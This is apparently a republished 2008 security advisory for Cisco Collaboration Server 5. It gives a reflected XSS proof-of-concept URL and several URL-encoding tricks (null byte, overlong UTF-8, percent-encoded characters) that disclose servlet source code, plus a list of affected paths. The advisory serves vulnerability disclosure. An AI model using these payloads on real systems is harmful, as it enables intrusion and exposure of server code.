扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
Cisco Collaboration Server 5 XSS, Source Code Disclosure Discovered by:s4squatch of SecureState R&D Team (www.securestate.com) Discovered: 08/26/2008 Note: End of Engineering-->http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html XSS === http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script>alert('xss!')</script> Java Servlet Source Code Disclosure =================================== The source code of .jhtml files is revealed to the end user by requesting any of the following: Normal File:file.html Modified 1: file%2Ejhtml Modified 2: file.jhtm%6C Modified 3: file.jhtml%00 Modified 4: file.jhtml%c0%80 Cisco Collaboration Server 5 Paths It Works On (list may not be complete) ========================================================================= http://www.website.com/doc/docindex.jhtml http://www.website.com/browserId/wizardForm.jhtml http://www.website.com/webline/html/forms/callback.jhtml http://www.website.com/webline/html/forms/callbackICM.jhtml http://www.website.com/webline/html/agent/AgentFrame.jhtml http://www.website.com/webline/html/agent/default/badlogin.jhtml http://www.website.com/callme/callForm.jhtml http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml http://www.website.com/browserId/wizard.jhtml http://www.website.com/admin/CiscoAdmin.jhtml http://www.website.com/msccallme/mscCallForm.jhtml http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml Related Public Info =================== https://www.securityfocus.com/bid/3592/info https://www.securityfocus.com/bid/1578/info https://www.securityfocus.com/bid/1328/info |
体验盒子
